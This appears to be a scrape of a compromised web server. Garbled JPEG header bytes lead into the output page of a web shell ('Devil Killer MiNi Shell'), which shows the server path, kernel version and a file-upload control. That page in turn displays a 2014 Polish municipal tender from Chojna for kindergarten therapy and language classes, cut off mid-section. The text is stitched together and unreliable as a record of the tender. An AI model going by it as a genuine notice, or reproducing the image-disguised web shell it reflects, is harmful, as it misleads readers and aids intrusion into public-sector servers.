JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140408/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140408/119436-N-2014.html

<p class="kh_header"><b>Chojna: Zakup usługi edukacyjnej projekt współfinansowany ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego Projekt        Pomóż mi, a będę miał równy start Nr wniosku WND - POKL.09.01.01-32-010/13, Nr Umowy UDA - POKL.09.01.01-32-010/13-00</b><br>
<b>Numer ogłoszenia: 119436 - 2014; data zamieszczenia: 08.04.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Chojna , ul. Jagiellońska 4, 74-500 Chojna, woj. zachodniopomorskie, tel. 091 4141485: 4141035, faks 0914141117.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.chojna.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup usługi edukacyjnej projekt współfinansowany ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego Projekt        Pomóż mi, a będę miał równy start Nr wniosku WND - POKL.09.01.01-32-010/13, Nr Umowy UDA - POKL.09.01.01-32-010/13-00.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest Zakup usługi edukacyjnej z podziałem na części:
 łącznie  10 Zadań, dla Przedszkola Miejskiego w Chojnie.
Zadanie nr 1: Przeprowadzenie 84 godzin zajęć z nauczania języka angielskiego w terminie do 30 września 2015 r.
Opis przedmiotu zamówienia obejmuje:
1.	Przeprowadzenie łącznie 84 godzin zegarowych zajęć z języka angielskiego podzielonych na 30 minutowe zajęcia.
2.	Opracowanie miesięcznych planów pracy z dziećmi w wieku przedszkolnym w wymiarze 84 godzin w czasie trwania Projektu.
3.	Prowadzenie zajęć z wykorzystaniem aktywizujących metod pracy poprzez zabawę, piosenki, zajęcia ruchowe zgodnie z podstawą programową wychowania przedszkolnego. Celem zajęć będzie nauka podstawowych zwrotów w języku angielskim, oswojenie dzieci z nowym językiem, kształtowanie umiejętności językowych m.in. słuchania i dedukowania znaczenia słów z kontekstu, zainteresowanie dzieci kulturą krajów anglojęzycznych.
4.	Zamawiający nie przewiduje zakupu podręczników, ani kart pracy dla dzieci.
5.	Dokładny termin wykonania zamówienia określi umowa z Wykonawcą.
6.	Systematyczne dokumentowanie prowadzonych zajęć poprzez dokonywanie wpisów w dzienniku i na listach obecności.
7.	Współpracę z personelem Projektu celem realizacji zamierzonych działań i osiągnięcia zaplanowanych celów Projektu.
8.	Niezwłoczne informowanie o każdym przypadku uniemożliwiającym realizację zajęć zgodnie z harmonogramem.
9.	W przypadku niemożliwości realizowania przez Wykonawcę przedmiotu umowy zgodnie z harmonogramem zajęć, spowodowanej usprawiedliwioną nieobecnością (udokumentowaną zwolnieniem lekarskim lub innym dokumentem urzędowym), Wykonawca zobowiązany jest do przeprowadzenia zajęć w ilości godzin równej nieodbytym zajęciom w innym terminie.
10.	Zamawiający zastrzega sobie możliwość zmian w planie zajęć, o których poinformuje Wykonawcę najpóźniej na 3 dni przed ustaloną wcześniej datą zajęć.
11.	Monitorowanie postępów dzieci poprzez zapisy w indywidualnych kartach dziecka oraz przygotowywanie co trzy miesiące indywidualnych opisowych raportów z postępów dzieci.
Zadanie nr 2: Przeprowadzenie 84 godzin zajęć z rytmiki w terminie do 30 września 2015 r.
Opis przedmiotu zamówienia obejmuje:
1.	Przeprowadzenie łącznie 84 godzin zegarowych zajęć z rytmiki podzielonych na 30 minutowe zajęcia.
2.	Opracowanie miesięcznych planów pracy zajęć z rytmiki dla dzieci w wieku przedszkolnym w wymiarze 84 godzin w czasie trwania Projektu.
3.	Prowadzenie zajęć z rytmiki, których celem będzie rozwijanie twórczej inicjatywy dziecka poprzez śpiew, taniec, słuchanie muzyki, grane na instrumentach, wystukiwanie rytmów itd. oraz kształcenie samodzielności, twórczej postawy i aktywności pozwalającej na pozbycie się zahamowań.
4.	Prowadzenie zajęć z wykorzystaniem aktywizujących metod pracy przy zastosowaniu różnego rodzaju gier i zabaw, zgodnie z podstawą programową wychowania przedszkolnego.
5.	Dokładny termin wykonania zamówienia określi umowa z Wykonawcą.
6.	Systematyczne dokumentowanie prowadzonych zajęć poprzez dokonywanie wpisów w dzienniku i na listach obecności.
7.	Współpracę z personelem Projektu celem realizacji zamierzonych działań i osiągnięcia zaplanowanych celów Projektu.
8.	Niezwłoczne informowanie o każdym przypadku uniemożliwiającym realizację zajęć zgodnie z harmonogramem.
9.	W przypadku niemożliwości realizowania przez Wykonawcę przedmiotu umowy zgodnie z harmonogramem zajęć, spowodowanej usprawiedliwioną nieobecnością (udokumentowaną zwolnieniem lekarskim lub innym dokumentem urzędowym), Wykonawca zobowiązany jest do przeprowadzenia zajęć w ilości godzin równej nieodbytym zajęciom w innym terminie.
10.	Zamawiający zastrzega sobie możliwość zmian w planie zajęć, o których poinformuje Wykonawcę najpóźniej na 3 dni przed ustaloną wcześniej datą zajęć.
11.	Monitorowanie postępów dzieci poprzez zapisy w indywidualnych kartach dziecka oraz przygotowywanie co trzy miesiące indywidualnych opisowych raportów z postępów dzieci.
Zadanie nr 3: Przeprowadzenie 168 godzin zajęć psychologicznych w terminie do 30 września 2015 r.
Opis przedmiotu zamówienia obejmuje:
1.	Przeprowadzenie łącznie 168 godzin zegarowych zajęć z psychologiem podzielonych na 30 minutowe zajęcia.
2.	Opracowanie planu pracy na czas realizacji projektu.
3.	Prowadzenie obserwacji zachowań dzieci związanych z ich funkcjonowaniem w grupie integracyjnej, prowadzenie zajęć w czasie których przeprowadzane będą: badanie diagnostyczne, diagnozowanie potencjalnych możliwości dzieci, wspieranie mocnych stron i stymulowanie gorzej rozwiniętych obszarów, diagnozowanie sytuacji wychowawczych w celu wspierania rozwoju dziecka, określanie odpowiednich form pomocy psychologiczno - pedagogicznej, w tym działań profilaktycznych, mediacyjnych i interwencyjnych wobec dzieci, rodziców i nauczycieli, minimalizowanie skutków zaburzeń rozwojowych, zapobieganie zaburzeniom zachowania oraz inicjowanie różnych form pomocy wychowawczej.
4.	Współpracę z wychowawcami i rodzicami/opiekunami prawnymi w minimalizowaniu skutków zaburzeń rozwojowych, zapobieganie zaburzeniom zachowania oraz inicjowanie różnych form pomocy wychowawczej.
5.	Prowadzenie doradztwa psychologicznego dla rodziców/opiekunów prawnych i nauczycieli.
6.	Dokładny termin wykonania zamówienia określi umowa z Wykonawcą.
7.	Systematyczne dokumentowanie prowadzonych zajęć poprzez dokonywanie wpisów w dzienniku i na listach obecności.
8.	Współpracę z personelem Projektu celem realizacji zamierzonych działań i osiągnięcia zaplanowanych celów Projektu.
9.	Niezwłoczne informowanie o każdym przypadku uniemożliwiającym realizację zajęć zgodnie z harmonogramem.
10.	W przypadku niemożliwości realizowania przez Wykonawcę przedmiotu umowy zgodnie z harmonogramem zajęć, spowodowanej usprawiedliwioną nieobecnością (udokumentowaną zwolnieniem lekarskim lub innym dokumentem urzędowym), Wykonawca zobowiązany jest do przeprowadzenia zajęć w ilości godzin równej nieodbytym zajęciom w innym terminie.
11.	Zamawiający zastrzega sobie możliwość zmian w planie zajęć, o których poinformuje Wykonawcę najpóźniej na 3 dni przed ustaloną wcześniej datą zajęć.
12.	Monitorowanie postępów dzieci poprzez zapisy w indywidualnych kartach dziecka oraz przygotowywanie co trzy miesiące indywidualnych opisowych raportów z postępów dzieci.
Zadanie nr 4: Przeprowadzenie 252 godzin zajęć logopedii w terminie do 30 września 2015 r.
Opis przedmiotu zamówienia obejmuje:
1.	Przeprowadzenie łącznie 252 godzin zegarowych zajęć grupowych (do 8 osób) lub indywidualnych z logopedą podzielonych na 30 minutowe zajęcia.
2.	Prowadzenie zajęć terapii logopedycznej z dziećmi uczęszczającymi do oddziału integracyjnego Również z dziećmi niepełnosprawnymi posiadającymi orzeczenia o potrzebie kształcenia specjalnego oraz opinie z Poradni Psychologiczno - Pedagogicznej.
3.	Przeprowadzenie diagnozy logopedycznej, obejmującej badanie mowy i motoryki narządów artykulacyjnych, określenie rodzaju wady wymowy, sporządzenie diagnozy oraz opracowania indywidualnego planu terapii logopedycznej dla poszczególnych dzieci i omówienie jej treść z rodzicami / opiekunami prawnymi.
4.	Przygotowanie kart pacy niezbędnych do zajęć.
5.	Nawiązanie ścisłej współpracy z rodziną dziecka w celu eliminowania niewłaściwych postaw rodziców wobec dziecka z wadą wymowy, wspierania i motywowanie do pracy z dzieckiem w domu. Organizowanie zajęć otwartych dla rodziców, porad, konsultacji i warsztatów dla nauczycieli.
6.	Dokładny termin wykonania zamówienia określi umowa z Wykonawcą.
7.	Systematyczne dokumentowanie prowadzonych zajęć poprzez dokonywanie wpisów w dzienniku i na listach obecności.
8.	Współpracę z personelem Projektu celem realizacji zamierzonych działań i osiągnięcia zaplanowanych celów Projektu.
9.	Niezwłoczne informowanie o każdym przypadku uniemożliwiającym realizację zajęć zgodnie z harmonogramem.
10.	W przypadku niemożliwości realizowania przez Wykonawcę przedmiotu umowy zgodnie z harmonogramem zajęć, spowodowanej usprawiedliwioną nieobecnością (udokumentowaną zwolnieniem lekarskim lub innym dokumentem urzędowym), Wykonawca zobowiązany jest do przeprowadzenia zajęć w ilości godzin równej nieodbytym zajęciom w innym terminie.
11.	Zamawiający zastrzega sobie możliwość zmian w planie zajęć, o których poinformuje Wykonawcę najpóźniej na 3 dni przed ustaloną wcześniej datą zajęć.
12.	Monitorowanie postępów dzieci poprzez zapisy w indywidualnych kartach dziecka oraz przygotowywanie co trzy miesiące indywidualnych opisowych raportów z postępów dzieci.
Zadanie nr 5: Przeprowadzenie 168 godzin zajęć z pedagogiem specjalnym w terminie do 30 września 2015 r.
Opis przedmiotu zamówienia obejmuje:
1.	Przeprowadzenie łącznie 168 godzin zegarowych zajęć z pedagogiem specjalnym podzielonych na 30 minutowe zajęcia.
2.	Prowadzenie zajęć mających na celu integrację dzieci zdrowych z niepełnosprawnymi.
3.	Rozpoznawanie potrzeb rozwojowych dzieci niepełnosprawnych, wspieranie ich rozwoju psychofizycznego, zdolności i zainteresowań.
4.	Opracowanie i realizację indywidualnych programów pracy z dziećmi niepełnosprawnymi.
5.	Przygotowanie i prowadzenie zajęć dydaktycznych za pomocą twórczych i nowoczesnych metod nauczania zgodnych z podstawą programową wychowania przedszkolnego dostosowaną do możliwości dzieci niepełnosprawnych.
6.	Prowadzenie doradztwa pedagogicznego dla rodziców/opiekunów prawnych i nauczycieli.
7.	Dokładny termin wykonania zamówienia określi umowa z Wykonawcą.
8.	Systematyczne dokumentowanie prowadzonych zajęć poprzez dokonywanie wpisów w dzienniku i na listach obecności.
9.	Współpracę z personelem Projektu celem realizacji zamierzonych działań i osiągnięcia zaplanowanych celów Projektu.
10.	Niezwłoczne informowanie o każdym przypadku uniemożliwiającym realizację zajęć zgodnie z harmonogramem.
11.	W przypadku niemożliwości realizowania przez Wykonawcę przedmiotu umowy zgodnie z harmonogramem zajęć, spowodowanej usprawiedliwioną nieobecnością (udokumentowaną zwolnieniem lekarskim lub innym dokumentem urzędowym), Wykonawca zobowiązany jest do przeprowadzenia zajęć w ilości godzin równej nieodbytym zajęciom w innym terminie.
12.	Zamawiający zastrzega sobie możliwość zmian w planie zajęć, o których poinformuje Wykonawcę najpóźniej na 3 dni przed ustaloną wcześniej datą zajęć.
13.	Monitorowanie postępów dzieci poprzez zapisy w indywidualnych kartach dziecka oraz przygotowywanie co trzy miesiące indywidualnych opisowych raportów z postępów dzieci.
Zadanie nr 6: Przeprowadzenie 168 godzin zajęć rehabilitacji w terminie do 30 września    2015 r.
Opis przedmiotu zamówienia obejmuje:
1.	Przeprowadzenie łącznie 168 godzin zegarowych zajęć grupowych (do 8 osób) lub indywidualnych z rehabilitantem podzielonych na 30 minutowe zajęcia.
2.	Opracowanie planu zajęć gimnastyki korekcyjnej dla dzieci na czas trwania Projektu.
3.	Przeprowadzenie zajęć w formie zabaw, ćwiczeń i gier ruchowych, które będą miały charakter stymulujący. Celem zajęć będzie wyrównanie lub zmniejszenie zaburzeń uwarunkowanych uszkodzeniem OUN, minimalizowanie trudności rozwojowych dziecka, wspomaganie jego rozwoju psychomotorycznego, korygowanie ewentualnych zaburzeń w rozwoju funkcji percepcyjno-motorycznych, i poprawią ogólnie rozwój dziecka.
4.	Dokonanie na pierwszych zajęciach m.in. oceny napięcia mięśniowego, postawy ciała i reakcji równoważnych. Ocenienie sprawności rąk (motoryka mała), koordynacji wzrokowo-słuchowo-ruchowej oraz orientacji w schemacie własnego ciała i przestrzeni. Wprowadzenie podczas zajęć elementów różnych metod i programów wspierających rozwój dzieci, m.in: metody Ruchu Rozwijającego W. Sherborne, metody Orffa i Labana, program aktywności Ch. Knilla itp.
5.	Wskazanie rodzicom jak, w warunkach domowych, pobudzać rozwój ruchowy dziecka, wzmacniać siłę jego mięśni i zapobiegać wadom postawy.
6.	Dokładny termin wykonania zamówienia określi umowa z Wykonawcą.
7.	Systematyczne dokumentowanie prowadzonych zajęć poprzez dokonywanie wpisów w dzienniku i na listach obecności.
8.	Współpracę z personelem Projektu celem realizacji zamierzonych działań i osiągnięcia zaplanowanych celów Projektu.
9.	Niezwłoczne informowanie o każdym przypadku uniemożliwiającym realizację zajęć zgodnie z harmonogramem.
10.	W przypadku niemożliwości realizowania przez Wykonawcę przedmiotu umowy zgodnie z harmonogramem zajęć, spowodowanej usprawiedliwioną nieobecnością (udokumentowaną zwolnieniem lekarskim lub innym dokumentem urzędowym), Wykonawca zobowiązany jest do przeprowadzenia zajęć w ilości godzin równej nieodbytym zajęciom w innym terminie.
11.	Zamawiający zastrzega sobie możliwość zmian w planie zajęć, o których poinformuje Wykonawcę najpóźniej na 3 dni przed ustaloną wcześniej datą zajęć.
12.	Monitorowanie postępów dzieci poprzez zapisy w indywidualnych kartach dziecka oraz przygotowywanie co trzy miesiące indywidualnych opisowych raportów z postępów dzieci.
Zadanie nr 7: Przeprowadzenie 84 godzin zajęć muzykoterapii w terminie do 30 września 2015 r.
Opis przedmiotu zamówienia obejmuje:
1.	Przeprowadzenie łącznie 84 godzin zegarowych zajęć grupowych (do 8 osób) lub indywidualnych z muzykoterapii podzielonych na 30 minutowe zajęcia.
2.	Prowadzenie zajęć mających na celu integrację dzieci zdrowych z niepełnosprawnymi, poprawę komunikacji, naukę odpoczynku i relaksacji, usprawnienia funkcji percepcyjno - motorycznych, uwrażliwienia na piękno muzyki oraz poprawienia kondycji ruchowej i psychofizycznej.
3.	Opracowanie miesięcznych planów pracy z muzykoterapii dla dzieci w czasie trwania Projektu.
4.	Dokładny termin wykonania zamówienia określi umowa z Wykonawcą.
5.	Systematyczne dokumentowanie prowadzonych zajęć poprzez dokonywanie wpisów w dzienniku i na listach obecności.
6.	Współpracę z personelem Projektu celem realizacji zamierzonych działań i osiągnięcia zaplanowanych celów Projektu.
7.	Niezwłoczne informowanie o każdym przypadku uniemożliwiającym realizację zajęć zgodnie z harmonogramem.
8.	W przypadku niemożliwości realizowania przez Wykonawcę przedmiotu umowy zgodnie z harmonogramem zajęć, spowodowanej usprawiedliwioną nieobecnością (udokumentowaną zwolnieniem lekarskim lub innym dokumentem urzędowym), Wykonawca zobowiązany jest do przeprowadzenia zajęć w ilości godzin równej nieodbytym zajęciom w innym terminie.
9.	Zamawiający zastrzega sobie możliwość zmian w planie zajęć, o których poinformuje Wykonawcę najpóźniej na 3 dni przed ustaloną wcześniej datą zajęć.
10.	Monitorowanie postępów dzieci poprzez zapisy w indywidualnych kartach dziecka oraz przygotowywanie co trzy miesiące indywidualnych opisowych raportów z postępów dzieci.
Zadanie nr 8: Przeprowadzenie 84 godzin socjoterapii w terminie do 30 września 2015 r.
Opis przedmiotu zamówienia obejmuje:
1.	Przeprowadzenie łącznie 84 godzin zegarowych zajęć grupowych (do 8 osób) socjoterapeutycznych podzielonych na 30 minutowe zajęcia.
2.	Przeprowadzenie badań rozpoznających indywidualne potrzeby dzieci oraz przeprowadzenie zajęć mających na celu wzmacnianie motywacji, eliminowanie niepożądanego zachowania, usprawnianie funkcjonowania społecznego i naukę nowych umiejętności społecznych.
3.	Stworzenie możliwości do mówienia o własnych udanych i nieudanych relacjach z dorosłymi i rówieśnikami, nauczenia wychodzenia z ról niekorzystnych dla dziecka oraz stworzenia możliwości odreagowania napięcia oraz wyzwalania emocji, a także nauczenia rozpoznawania i wyrażania swoich emocji.
4.	Opracowanie miesięcznych planów zajęć socjoterapeutycznych dostosowanych do rozpoznanych trudności dzieci.
5.	Dokładny termin wykonania zamówienia określi umowa z Wykonawcą.
6.	Systematyczne dokumentowanie prowadzonych zajęć poprzez dokonywanie wpisów w dzienniku i na listach obecności.
7.	Współpracę z personelem Projektu celem realizacji zamierzonych działań i osiągnięcia zaplanowanych celów Projektu.
8.	Niezwłoczne informowanie o każdym przypadku uniemożliwiającym realizację zajęć zgodnie z harmonogramem.
9.	W przypadku niemożliwości realizowania przez Wykonawcę przedmiotu umowy zgodnie z harmonogramem zajęć, spowodowanej usprawiedliwioną nieobecnością (udokumentowaną zwolnieniem lekarskim lub innym dokumentem urzędowym), Wykonawca zobowiązany jest do przeprowadzenia zajęć w ilości godzin równej nieodbytym zajęciom w innym terminie.
10.	Zamawiający zastrzega sobie możliwość zmian w planie zajęć, o których poinformuje Wykonawcę najpóźniej na 3 dni przed ustaloną wcześniej datą zajęć.
11.	Monitorowanie postępów dzieci poprzez zapisy w indywidualnych kartach dziecka oraz przygotowywanie co trzy miesiące indywidualnych opisowych raportów                z postępów dzieci.
Zadanie nr 9: Przeprowadzenie 42 godzin zajęć z pielęgniarką w terminie do 30 września 2015 r.
Opis przedmiotu zamówienia obejmuje:
1.	Przeprowadzenie łącznie 42 godzin zegarowych zajęć grupowych z pielęgniarką podzielonych na 30 minutowe zajęcia.
2.	Przeprowadzenie badań pod kątem prawidłowego rozwoju dzieci.
3.	Założenie dzieciom kart rozwoju dziecka.
4.	Opracowanie planu pracy na czas realizacji projektu.
5.	Przeprowadzenie cyklu spotkań przybliżających dzieciom edukację medyczną (zachowania prozdrowotne, udzielanie pierwszej pomocy itp.) oraz edukację ekologiczną.
6.	Dokładny termin wykonania zamówienia określi umowa z Wykonawcą.
7.	Systematyczne dokumentowanie prowadzonych zajęć poprzez dokonywanie wpisów w dzienniku i na listach obecności.
8.	Współpracę z personelem Projektu celem realizacji zamierzonych działań i osiągnięcia zaplanowanych celów Projektu.
9.	Niezwłoczne informowanie o każdym przypadku uniemożliwiającym realizację zajęć zgodnie z harmonogramem.
10.	W przypadku niemożliwości realizowania przez Wykonawcę przedmiotu umowy zgodnie z harmonogramem zajęć, spowodowanej usprawiedliwioną nieobecnością (udokumentowaną zwolnieniem lekarskim lub innym dokumentem urzędowym), Wykonawca zobowiązany jest do przeprowadzenia zajęć w ilości godzin równej nieodbytym zajęciom w innym terminie.
11.	Zamawiający zastrzega sobie możliwość zmian w planie zajęć, o których poinformuje Wykonawcę najpóźniej na 3 dni przed ustaloną wcześniej datą zajęć.
12.	Monitorowanie postępów dzieci poprzez zapisy w indywidualnych kartach dziecka oraz przygotowywanie co trzy miesiące indywidualnych opisowych raportów z postępów dzieci.
Zadanie nr 10: Przeprowadzenie 30 godzin badań ortopedycznych w terminie do 30 września     2015 r.
Opis przedmiotu zamówienia obejmuje:
1.	Przeprowadzenie 15 godzin badań ortopedycznych dzieciom i postawienie diagnozy w terminie do 31.05.2014 r.
2.	Przeprowadzenie 15 godzin badań ortopedycznych dzieciom i postawienie diagnozy w terminie do 28.02.2015 r.
3.	Opracowanie strategii pracy sensoryczno-terapeutycznej oraz planu pracy na czas realizacji projektu.
4.	Dokładny termin wykonania zamówienia określi umowa z Wykonawcą.
5.	Systematyczne dokumentowanie prowadzonych zajęć poprzez dokonywanie wpisów w dzienniku i na listach obecności.
6.	Współpracę z personelem Projektu celem realizacji zamierzonych działań i osiągnięcia zaplanowanych celów Projektu.
7.	Niezwłoczne informowanie o każdym przypadku uniemożliwiającym realizację zajęć zgodnie z harmonogramem.
8.	W przypadku niemożliwości realizowania przez Wykonawcę przedmiotu umowy zgodnie z harmonogramem zajęć, spowodowanej usprawiedliwioną nieobecnością (udokumentowaną zwolnieniem lekarskim lub innym dokumentem urzędowym), Wykonawca zobowiązany jest do przeprowadzenia zajęć w ilości godzin równej nieodbytym zajęciom w innym terminie.
9.	Zamawiający zastrzega sobie możliwość zmian w planie zajęć, o których poinformuje Wykonawcę najpóźniej na 3 dni przed ustaloną wcześniej datą zajęć.
Część wspólna dla zadań 1-10:
1.	Systematyczne dokumentowanie prowadzonych zajęć poprzez dokonywanie wpisów 
w dzienniku i na listach obecności.
2.	Współpracę z personelem Projektu celem realizacji zamierzonych działań i osiągnięcia zaplanowanych celów Projektu.
3.	Niezwłoczne informowanie o każdym przypadku uniemożliwiającym realizację zajęć zgodnie z harmonogramem.
4.	W przypadku niemożliwości realizowania przez Wykonawcę przedmiotu umowy zgodnie z harmonogramem zajęć, spowodowanej usprawiedliwioną nieobecnością (udokumentowaną zwolnieniem lekarskim lub innym dokumentem urzędowym), Wykonawca zobowiązany jest do przeprowadzenia zajęć w ilości godzin równej nieodbytym zajęciom w innym terminie.
5.	Zamawiający zastrzega sobie możliwość zmian w planie zajęć, o których poinformuje Wykonawcę najpóźniej na 3 dni przed ustaloną wcześniej datą zajęć.
6.	Dla zadań 1-3, 5 i 7-9: Monitorowanie postępów dzieci poprzez zapisy 
w indywidualnych kartach dziecka oraz przygotowywanie co trzy miesiące indywidualnych opisowych raportów z postępów dzieci..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 10.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od precyzowania w powyższym zakresie wymagań, których spełnienie Wykonawca zobowiązany byłby wykazać w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od precyzowania w powyższym zakresie wymagań, których spełnienie Wykonawca zobowiązany byłby wykazać w  tym zakresie.
Zamawiający uzna warunek za spełniony i dokona oceny spełnienia warunków udziału w postępowaniu  w oparciu o  oświadczenie z art. 22 ust. 1 złożone przez wykonawcę w niniejszym postępowaniu.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
